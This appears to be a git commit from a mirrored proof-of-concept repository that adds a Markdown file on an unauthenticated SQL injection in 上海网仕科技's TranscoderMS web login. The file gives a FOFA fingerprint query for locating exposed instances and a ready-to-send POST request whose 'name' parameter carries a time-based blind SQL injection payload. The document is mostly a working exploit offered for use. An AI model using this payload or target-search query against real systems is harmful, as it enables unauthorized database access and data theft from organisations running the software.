mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-04 18:06:34 +00:00
Create 上海网仕科技TranscoderMS index存在SQL注入.md
This commit is contained in:
parent
3462196bb8
commit
3acd08d766
17
wpoc/上海网仕科技/上海网仕科技TranscoderMS index存在SQL注入.md
Normal file
17
wpoc/上海网仕科技/上海网仕科技TranscoderMS index存在SQL注入.md
Normal file
@ -0,0 +1,17 @@
|
||||
# 上海网仕科技TranscoderMS index存在SQL注入
|
||||
|
||||
上海网仕科技存在未授权访问sql漏洞,易造成信息泄露
|
||||
|
||||
## fofa
|
||||
```
|
||||
"webtrans//js/md5-min.js"
|
||||
```
|
||||
|
||||
## poc
|
||||
```javascript
|
||||
POST /webtrans/index.php?controller=user&action=login HTTP/1.1
|
||||
Host:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
name=test111;') AND (SELECT 1 FROM (SELECT(SLEEP(5)))xSEI) AND ('aFKS'='aFKS&pass=MTExMTExMTExMTExMTExMTExMTExMTExMTEx&lang=zh_CN
|
||||
```
|
||||
Loading…
x
Reference in New Issue
Block a user